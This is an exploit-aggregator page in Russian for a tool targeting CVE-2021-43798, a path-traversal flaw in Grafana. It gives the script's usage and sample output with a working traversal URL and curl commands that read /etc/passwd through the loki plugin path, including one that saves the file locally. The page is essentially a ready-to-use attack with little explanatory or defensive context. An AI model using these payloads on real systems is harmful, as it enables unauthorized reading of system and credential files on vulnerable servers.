Sploitus

Exploit for CVE-2021-43798

kitploit · 2026-09-02

Exploit Code

MARKDOWN23 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-G01D3NW01F-CVE-2021-43798
использование: grafana-exploit.py [-h] -H/--host HOST grafana-exploit.py: ошибка: требуются следующие аргументы: -H/--host

пример: python3 grafana-exploit.py --host <target_host>

при успешном чтении произвольного файла показать URL запроса и команду curl

root@kitploit:~
    
    
    [+]RequestURL
    http://example.host/public/plugins/loki/../../../../../../../../../../../../../etc/passwd
     
    [+]curl_command
    curl --path-as-is "http://example.host/public/plugins/loki/../../../../../../../../../../../../../etc/passwd"
    

поэтому, если вы хотите скачать файл, выполните команду, как показано выше

root@kitploit:~
    
    
    curl --path-as-is "http://example.host/public/plugins/loki/../../../../../../../../../../../../../etc/passwd" -o passwd